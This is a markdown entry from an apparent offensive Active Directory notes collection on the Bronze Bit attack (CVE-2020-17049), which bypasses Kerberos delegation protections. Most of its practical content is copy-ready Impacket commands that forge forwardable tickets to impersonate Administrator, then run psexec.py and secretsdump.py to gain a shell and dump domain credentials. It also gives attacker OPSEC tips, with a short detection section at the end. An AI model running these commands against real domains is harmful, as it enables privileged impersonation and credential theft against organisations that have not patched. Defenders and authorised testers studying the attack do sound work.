attack-18-bronze-bit-attack-cve-2020-17049.md (6622B)
1 --- 2 title: "Attack #18 β Bronze Bit Attack (CVE-2020-17049)" 3 description: "The Bronze Bit attack exploits CVE-2020-17049, a vulnerability in the Kerberos Constrained Delegation mechanism. It allows an attacker to bypass theβ¦" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "kerberos", "delegation"] 7 tools: ["Impacket", "Mimikatz", "Rubeus"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/π Attack #18 β Bronze Bit Attack (CVE-2020-17049).md" 11 --- 12 # π Attack #18 β Bronze Bit Attack (CVE-2020-17049) 13 14 *** 15 16 ## π How It Works 17 18 The Bronze Bit attack exploits **CVE-2020-17049**, a vulnerability in the Kerberos Constrained Delegation mechanism. It allows an attacker to **bypass the "sensitive and cannot be delegated" account protection** and the **Protected Users group restriction** β two controls specifically designed to prevent delegation-based impersonation attacks. 19 20 ### The Vulnerability 21 22 When a service account with Constrained Delegation performs S4U2Self to get a ticket on behalf of a protected user, the KDC correctly issues that ticket with the `forwardable` flag **unset** β preventing S4U2Proxy from working. However, the `forwardable` flag is stored inside the encrypted portion of the ticket, which is encrypted with the **service account's long-term key**. Since the attacker already has the service account's key (it's a prerequisite for the attack), they can: 23 24 1. **Decrypt** the S4U2Self service ticket 25 2. **Flip the `forwardable` bit** from 0 to 1 26 3. **Re-encrypt** the ticket 27 4. **Present it to the KDC** in an S4U2Proxy request 28 29 The KDC sees the `forwardable` flag is set and processes the delegation request β **without re-validating whether the user is actually protected**. 30 31 ### Impact 32 33 | Without Bronze Bit | With Bronze Bit | 34 |---|---| 35 | Cannot impersonate users in Protected Users group | β CAN impersonate Protected Users | 36 | Cannot impersonate "sensitive and cannot be delegated" accounts | β CAN impersonate sensitive accounts | 37 | Domain Admins marked sensitive are safe from delegation | β Domain Admins are vulnerable again | 38 39 *** 40 41 ## βοΈ Prerequisites 42 43 | Requirement | Detail | 44 |---|---| 45 | **Compromised Constrained Delegation account** | Hash, password, or AES key of a service with CD or RBCD | 46 | **Target is unpatched** | CVE-2020-17049 patches (Dec 2020 / Jan 2021) must NOT be installed on DCs | 47 | **Target user is "sensitive" or in Protected Users** | Otherwise, standard S4U2Proxy works without Bronze Bit | 48 49 *** 50 51 ## π οΈ Tools 52 53 | Tool | Platform | Notes | 54 |---|---|---| 55 | **Impacket β getST.py** | Linux | `-force-forwardable` flag implements Bronze Bit | 56 | **Rubeus** | Windows | Manual ticket manipulation possible | 57 | **Mimikatz** | Windows | Ticket decryption and re-encryption | 58 59 *** 60 61 ## π» Full Commands 62 63 ### π΄ Impacket β getST.py with Bronze Bit (Linux) 64 65 ```bash 66 # ββ Standard S4U attack (fails on protected users without Bronze Bit) βββββββββ 67 getST.py -spn CIFS/DC01.corp.local \ 68 -impersonate Administrator \ 69 -dc-ip 10.10.10.10 \ 70 corp.local/svc_constrained:'Password1' 71 # Error: KDC_ERR_BADOPTION β user is sensitive / in Protected Users 72 73 # ββ Bronze Bit bypass β force forwardable flag ββββββββββββββββββββββββββββββββ 74 getST.py -spn CIFS/DC01.corp.local \ 75 -impersonate Administrator \ 76 -dc-ip 10.10.10.10 \ 77 -force-forwardable \ 78 corp.local/svc_constrained:'Password1' 79 80 # -force-forwardable = decrypts ticket, flips forwardable bit, re-encrypts 81 # Works even if Administrator is in Protected Users or marked "sensitive" 82 83 # ββ Using NT hash βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 84 getST.py -spn CIFS/DC01.corp.local \ 85 -impersonate Administrator \ 86 -hashes :a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 87 -dc-ip 10.10.10.10 \ 88 -force-forwardable \ 89 corp.local/svc_constrained 90 91 # ββ Use the ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 92 export KRB5CCNAME=Administrator@CIFS_DC01.corp.local@CORP.LOCAL.ccache 93 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 94 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 95 96 # ββ RBCD + Bronze Bit combo βββββββββββββββββββββββββββββββββββββββββββββββββββ 97 # If you've set up RBCD (Attack #17) but the target user is protected: 98 getST.py -spn cifs/TARGET.corp.local \ 99 -impersonate Administrator \ 100 -dc-ip 10.10.10.10 \ 101 -force-forwardable \ 102 corp.local/'FAKEMACHINE$':'FakePass123!' 103 ``` 104 105 *** 106 107 ## π― OPSEC Tips 108 109 - **Bronze Bit only matters on unpatched DCs** β Microsoft patched this in late 2020/early 2021 110 - **Always try standard S4U first** β only use `-force-forwardable` if you get `KDC_ERR_BADOPTION` 111 - **Check DC patch level** β if the DC is patched, Bronze Bit will fail and you'll need an alternative approach 112 - **Bronze Bit + RBCD** is a powerful combo β bypasses both the write-permission barrier and the protected-user barrier 113 114 *** 115 116 ## π‘οΈ Detection β Event IDs 117 118 | Event ID | Source | What to Look For | 119 |---|---|---| 120 | **4769** | Security Log (DC) | S4U2Proxy request for a user that should be delegation-protected | 121 | **4768** | Security Log (DC) | TGT request associated with the constrained delegation account | 122 123 **Primary detection:** If a user marked "sensitive and cannot be delegated" or in the Protected Users group successfully authenticates via delegation (Event 4624 with constrained delegation indicators), that's a Bronze Bit indicator. The DC **should** have rejected the delegation. 124 125 *** 126 127 ## π Attack Chain Context 128 129 ``` 130 [Bronze Bit] βββ Delegation Protection Bypass 131 β 132 ββββ π Bypasses "sensitive and cannot be delegated" flag 133 ββββ π‘οΈ Bypasses Protected Users group delegation restriction 134 ββββ π Chain with: Constrained Delegation (#16), RBCD (#17) 135 ββββ π CVE-2020-17049 β patched Dec 2020 / Jan 2021 136 ββββ π Defeated by: patch DCs, monitor for anomalous delegation events 137 ``` 138 139 *** 140 141 > β **Attack #18 β Bronze Bit complete.** 142 143 *** 144 145 > π **Category 2 β Kerberos Abuse is now COMPLETE (8/8 attacks).**